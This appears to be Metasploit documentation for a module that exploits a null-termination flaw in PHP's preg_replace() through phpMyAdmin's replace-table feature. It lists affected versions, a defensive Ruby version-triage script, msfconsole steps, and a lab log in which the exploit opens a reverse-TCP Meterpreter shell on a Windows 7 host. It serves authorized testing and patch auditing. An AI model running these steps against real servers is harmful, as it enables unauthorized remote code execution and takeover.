metasploit-gs/documentation/modules/exploit/multi/http/phpmyadmin_null_termination_exec.md
Jacob Robles 2e2ded22fc Use Gem::Version
Simplify version comparisons
2018-06-18 08:35:47 -05:00

Description

This module exploits a vulnerability in PHP's preg_replace() function, which is used by phpMyAdmin's replace table feature.

Vulnerable Application

PHP versions before 5.4.6 allow null termination of the preg_replace string parameter.

phpMyAdmin 4.6.x versions (prior to 4.6.3), 4.4.x versions (prior to 4.4.15.7), and 4.0.x versions (prior to 4.0.10.16) are affected.
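
For defenders auditing an inventory against the ranges above, the following added example (not part of the module or of Metasploit) classifies PHP and phpMyAdmin version strings with Gem::Version. The helper names, the three-way triage and the sample inventory are hypothetical; requiring both conditions for exposure is an assumption read from this page, and branches the page does not list (such as the 4.3.0 used in the scenario below) are reported for manual review rather than as safe.

```ruby
require 'rubygems' # Gem::Version ships with Ruby

# First fixed release per phpMyAdmin branch, exactly as listed on this page.
PMA_FIXED = {
  [4, 6] => Gem::Version.new('4.6.3'),
  [4, 4] => Gem::Version.new('4.4.15.7'),
  [4, 0] => Gem::Version.new('4.0.10.16')
}.freeze
PHP_FIXED = Gem::Version.new('5.4.6')

# Keep only the leading dotted-numeric part, so distro suffixes
# such as "5.3.10-1ubuntu3" or "4.4.15.6deb1" still compare cleanly.
def numeric_version(str)
  m = str.to_s[/\A\d+(?:\.\d+)*/]
  m && Gem::Version.new(m)
end

def php_status(version)
  v = numeric_version(version)
  return :unparseable unless v
  v < PHP_FIXED ? :affected : :patched
end

def pma_status(version)
  v = numeric_version(version)
  return :unparseable unless v
  fixed = PMA_FIXED[v.segments.first(2)]
  return :unlisted unless fixed # branch not named on this page
  v < fixed ? :affected : :patched
end

# Assumption: a host is exposed only when both components are affected.
def triage(php, pma)
  p = php_status(php)
  m = pma_status(pma)
  return :ok if p == :patched || m == :patched
  return :exposed if p == :affected && m == :affected
  :review # unlisted branch or unreadable version: check by hand
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample inventory: host => [PHP version, phpMyAdmin version]
  { 'web01' => ['5.3.8', '4.0.10.15'], 'web02' => ['5.3.8', '4.3.0'],
    'web03' => ['7.0.1', '4.6.2'] }.each do |host, (php, pma)|
    puts format('%-6s php=%-8s pma=%-10s %s', host, php, pma, triage(php, pma))
  end
end
```

Version strings alone cannot see distribution backports, so an :exposed result on a packaged install still needs confirming against the vendor's changelog.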

Options

DATABASE: This option specifies the database the module will use when creating a new table as part of the exploit.

Verification Steps

  • Install a vulnerable phpMyAdmin application
  • Create a database through the phpMyAdmin application
  • ./msfconsole
  • use exploit/multi/http/phpmyadmin_null_termination_exec
  • set USERNAME <username>
  • set PASSWORD <password>
  • set DATABASE <database>
  • set rhost <rhost>
  • run

Scenarios

Tested on Windows 7 x64 running phpMyAdmin 4.3.0 on PHP 5.3.8

msf5 > use exploit/multi/http/phpmyadmin_null_termination_exec
msf5 exploit(multi/http/phpmyadmin_null_termination_exec) > set rhost 172.22.222.122
rhost => 172.22.222.122
msf5 exploit(multi/http/phpmyadmin_null_termination_exec) > set database <database>
database => <database>
msf5 exploit(multi/http/phpmyadmin_null_termination_exec) > run

[*] Started reverse TCP handler on 172.22.222.177:4444 
[*] Sending stage (37775 bytes) to 172.22.222.122
[*] Sleeping before handling stage...
[*] Meterpreter session 2 opened (172.22.222.177:4444 -> 172.22.222.122:49169) at 2018-06-18 07:28:19 -0500
[-] 172.22.222.122:80 - Failed to remove the table 'spkkw'

meterpreter > sysinfo
Computer    : WIN-V438RLMESAE
OS          : Windows NT 6.1 build 7601 (Windows 7 Business Edition Service Pack 1) i586
Meterpreter : php/windows